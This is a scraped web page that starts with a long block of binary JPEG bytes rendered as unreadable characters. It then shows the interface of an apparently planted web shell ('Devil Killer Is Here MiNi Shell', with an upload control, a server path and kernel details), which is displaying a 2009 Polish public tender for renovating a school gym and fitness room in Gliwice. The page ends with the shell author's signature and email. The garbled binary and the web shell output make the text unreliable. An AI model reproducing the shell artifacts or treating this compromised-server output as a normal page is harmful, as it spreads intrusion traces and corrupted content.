JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090423/117964-N-2009.html

<p class="kh_header"><b>Gliwice: Remont sali gimnastycznej i siłowni. Prace malarskie, posadzkarskie, wymiana opraw oświetleniowych w tzw. nowym budynku szkoły.</b><br>
<b>Numer ogłoszenia: 117964 - 2009; data zamieszczenia: 23.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa z Oddziałami Integracyjnymi Nr 21 im. Henryka Sienkiewicza w Gliwicach , ul. Reymonta 18A, 44-103 Gliwice, woj. śląskie, tel. 032 2370928, faks 032 3371370.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Jednostka Oświaty.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sali gimnastycznej i siłowni. Prace malarskie, posadzkarskie, wymiana opraw oświetleniowych w tzw. nowym budynku szkoły..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy:
Remontu pomieszczeń szkolnych: sala gimnastyczna, siłownia, sale lekcyjne, korytarze wraz z
klatkami schodowymi, pomieszczenia ogólnodostępne, ciągi komunikacyjne
Zakres prac:
- Roboty posadzkarskie - wymiana parkietu w sali gimnastycznej na nowy parkiet
- Roboty posadzkarskie - wymiana posadzki z PCW na wykładzinę PCW obiektową do sal
lekcyjnych i siłowni
- Wymiana: w sali gimnastycznej, siłowni, salach lekcyjnych i korytarzach opraw
oświetleniowych na oprawy świetlówkowe zapewniające odpowiednie natężenie oświetlenia
- Roboty malarskie
Szczegółowy opis przedmiotu zamówienia zawarty jest w poniższym opracowaniach:
1. przedmiar robót (ZAŁĄCZNIK NR 7).
2. Specyfikacja Techniczna Wykonania i Odbioru Robót (ZAŁĄCZNIK NR 8).
Przedstawione w powyższych dokumentach wskazania na urządzenia techniczne i materiały z podaniem
producenta należy traktować jako przykładowe ze względu na zasady ustawy Prawo zamówień
publicznych, a zwłaszcza art. 29 do 31.
Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji przetargowej
rozwiązania z zachowaniem odpowiednich równoważnych parametrów technicznych dla osiągnięcia
oczekiwanej funkcjonalności całego układu będącego przedmiotem zamówienia z zapewnieniem
uzyskania wszelkich ewentualnie wymaganych uzgodnień.
Inne wymagania:
a) przy przygotowaniu oferty należy uwzględnić specyfikę pracy w czynnych obiektach oświatowych.
b) przed opracowaniem oferty Wykonawca powinien przeprowadzić wizję terenu robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.43.21.00-5, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 12. Wymagania dotyczące wadium
12.1. Zamawiający wymaga wniesienia wadium w kwocie: 11250,00 zł, (słownie złotych: jedenaście
tysięcy dwieście pięćdziesiąt)
12.2. Wykonawca zobowiązany jest do wniesienia wadium przed upływem terminu do składania ofert,
12.3. Wadium wnoszone w formie poręczeń lub gwarancji musi być ważne minimum przez okres
związania oferta, dotyczyć przedmiotowego zamówienia i zawierać klauzule gwarantujące
możliwość zatrzymania wadium w przypadkach, o których mowa w art. 46 ust. 4a i 5 ustawy pzp,
12.4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w ING Bank
Śląski nr 92 1050 1298 1000 0022 8901 0981 - potwierdzenie przelewu (oryginał lub kopię
potwierdzoną za zgodność z oryginałem przez osobę uprawnioną do podpisywania oferty) należy
dołączyć do oferty.
12.5. Jeżeli wadium wnoszone jest w formie innej niż pieniądz należy je złożyć w sekretariacie
Zamawiającego, od poniedziałku do piątku w godzinach 9:00 do 13:00 - kserokopię złożonego
dokumentu (potwierdzoną za zgodność z oryginałem, zawierającą potwierdzenie przyjęcia w depozyt
oryginału dokumentu przez Zamawiającego) należy dołączyć do oferty.
12.6. Wadium uważa się za wniesione w terminie, jeżeli znajdzie się na rachunku Zamawiającego lub
zostanie złożone w sekretariacie Zamawiającego w formie niepieniężnej przed upływem terminu
składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 8. Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych
warunków oraz wykaz oświadczeń i dokumentów jakie maja dostarczyć Wykonawcy w celu
potwierdzenia spełnienia warunków udziału w postępowaniu
8.1. Warunki przystąpienia do postępowania i wymagane dokumenty
8.1.1. Posiadanie uprawnień do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają
obowiązek posiadania takich uprawnień oraz nie podleganie wykluczeniu z postępowania o
udzielenie zamówienia (podstawy prawne wykluczenia z postępowania określają: art. 24 ust. 1 i 2
ustawy pzp).
w przypadku podmiotów działających wspólnie warunek dotyczący niepodlegania wykluczeniu,
zgodnie z art. 24 ust. 1 i 2, o którym mowa powyżej muszą spełniać wszystkie podmioty działające
wspólnie, warunek posiadania uprawnień musi spełniać co najmniej jeden z podmiotów
występujących wspólnie,8.1.1.1. W celu potwierdzenia, warunku(ów) określonego(ych) w pkt 8.1.1. - należy złożyć:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji
działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert; w przypadku spółki cywilnej - aktualne zaświadczenie o wpisie do ewidencji
działalności gospodarczej lub aktualny odpis z właściwego rejestru dla każdego ze wspólników;
b) aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego
potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek
na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości
wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem
terminu składania ofert.
8.1.2. Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych
podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:a) Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel:
- kierownika robót posiadającego uprawnienia budowlane do kierowania robotami w specjalności
konstrukcyjno-budowlanej oraz zaświadczenie o przynależności do właściwej izby samorządu
zawodowego;
- kierownika robót posiadającego uprawnienia budowlane do kierowania robotami w
specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz
zaświadczenie o przynależności do właściwej izby samorządu zawodowego,
b) Doświadczenie zawodowe:
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego
postępowania (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) ukończył z
należytą starannością realizację co najmniej 2 zadań odpowiadających swoim rodzajem robotom
budowlanym stanowiącym przedmiot niniejszego zamówienia (w tym: wymiana/ułożenie parkietu
w sali gimnastycznej, wymiana opraw oświetleniowych, układanie wykładziny PCW, roboty
malarskie) o wartości nie mniejszej niż 350.000,00 zł (brutto) każde zadanie.
W przypadku podmiotów działających wspólnie potencjał techniczny i osoby zdolne do
wykonania zamówienia podlegają sumowaniu, tak aby łącznie podmioty spełniały powyższe
warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 8.1.2.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 8.1.2 należy złożyć:
a) dokumenty stwierdzające, że kierownik robót, który będzie wykonywać przedmiot zamówienia
posiada wymagane uprawnienia budowlane oraz zaświadczenie o przynależności do właściwej izby
samorządu zawodowego z uwzględnieniem wymogów wg pkt 8.1.2.a..
b) wykaz (na zał. nr 3 do SIWZ lub dokumencie zgodnym z treścią załącznika) osób które będą
uczestniczyć w wykonywaniu zamówienia.
c) wykaz (na zał. nr 4 do SIWZ lub dokumencie zgodnym z treścią załącznika) wykonanych w okresie
ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia
działalności jest krótszy w tym okresie, robót budowlanych odpowiadających swoim rodzajem i
wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz
daty i miejsca wykonania oraz załączeniem dokumentów (np. referencji) potwierdzających, że roboty
te zostały wykonane należycie z uwzględnieniem wymogów wg pkt 8.1.2.b.8.1.3. Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Wykonawca winien mieć dostęp lub dysponować środkami finansowymi wystarczającymi do
realizacji zamówienia.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu
8.1.3.1. W celu potwierdzenia warunku(ów) określonego(ych) w pkt 8.1.3 należy złożyć:
oświadczenie na załączniku nr 2
8.1.4. W celu potwierdzenia warunków określonych w pkt 8.1.1, 8.1.2, 8.1.3 należy złożyć oświadczenie o
spełnieniu warunków udziału w postępowaniu (z art. 22 ust. 1, art. 24 ust. 1 i 2 ustawy pzp) o treści
ZAŁĄCZNIKA NR 2, załączonego do niniejszej specyfikacji;
8.2. Dokumenty składane przez Wykonawców mających siedzibę lub miejsce zamieszkania poza
terytorium Polski8.2.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Polski, zamiast:
- aktualnego odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji
działalności gospodarczej,
- aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego
oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia
Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem
podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że
uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych
płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,
potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcyprzed upływem terminu składania ofert
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert
- nie zalega z uiszczaniem podatków, opłat i składek na ubezpieczenie społeczne i zdrowotne, albo że
uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3
miesiące przed upływem terminu składania ofert.
8.2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejscezamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 8.2.1., składa dokument zawierający
oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo
organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju,
w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
8.3. Opis sposobu dokonywania oceny spełnienia warunków przystąpienia do postępowania
8.3.1. Ocena spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i
oświadczeniach o których mowa w pkt 8. na zasadzie spełniania/nie spełnia.
8.3.2. Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił warunki
wymienione w pkt 8.
UWAGA! Brak jakiegokolwiek z wyżej wymienionych dokumentów żądanych przez Zamawiającego,
spowoduje wykluczenie Wykonawcy z postępowania z mocy art. 24 ust. 2 pkt 3 - dokumenty nie
spełniające wymogów, traktuje się jako nie złożenie wymaganych dokumentów z zastrzeżeniem
art. 26 ust. 3 ustawy pzp.9. Pozostałe dokumenty i oświadczenia, jakie musi zawierać oferta
9.1. Wykonawcy (w tym spółka cywilna) mogą wspólnie ubiegać się udzielenie zamówienia z
następującym zastrzeżeniem:
9.1.1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym spółka cywilna) muszą
ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu (lub reprezentowania w
postępowaniu i zawarcia umowy). Stosowne pełnomocnictwo należy załączyć do oferty w formie
oryginału lub kopii potwierdzonej za zgodność z oryginałem przez notariusza.
9.1.2. Pełnomocnictwo, o którym mowa w pkt 9.1.1. musi precyzować zakres umocowania i wskazywać
pełnomocnika. Musi też wyliczać wszystkich Wykonawców, którzy wspólnie ubiegają się o
zamówienie i każdy z nich musi podpisać się pod tym dokumentem.
9.2. Wypełniony i podpisany druk oferty - ZAŁĄCZNIK NR 1 do niniejszej specyfikacji.
9.3. Wykaz podwykonawców którzy będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na
temat zakresu wykonywanych przez nich czynności na załączniku Nr 6. (jeśli dotyczy)
9.4. Podpisany kosztorys ofertowy szczegółowy
9.5. Dowód wniesienia wadium, o którym mowa w pkt 12.UWAGA! W przypadku, gdy sposób reprezentacji nie jest określony w dokumentach rejestrowych
Zamawiający będzie stosował odpowiednio przepisy ustawy Kodeks spółek handlowych
dotyczące sposobu reprezentacji.
UWAGA! Podpis osoby/osób upoważnionej składany na dokumentach musi pozwalać na identyfikację jej
imienia i nazwiska (np. będzie uzupełniony pieczątką imienną)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Szkoły Podstawowej z Oddziałami Integracyjnymi nr 21 w Gliwicach
ul. Reymonta 18a.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 11:00, miejsce: Sekretariat Szkoły Podstawowej z Oddziałami Integracyjnymi nr 21 w Gliwicach
ul. Reymonta 18a.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com